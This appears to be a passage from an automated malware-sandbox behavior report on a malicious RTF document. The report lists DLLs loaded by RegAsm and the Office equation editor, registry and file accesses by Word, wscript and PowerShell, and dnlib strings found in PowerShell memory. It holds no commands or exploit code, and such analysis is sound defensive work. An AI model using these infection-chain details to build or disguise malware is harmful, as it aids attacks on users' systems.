                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: DSpWOKW7zn.LNK.0.drLNK file: ..\..\..\..\..\Desktop\DSpWOKW7zn.rtf
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.369629147.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.369396970.0000000000279000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.369629147.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.369396970.0000000000279000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
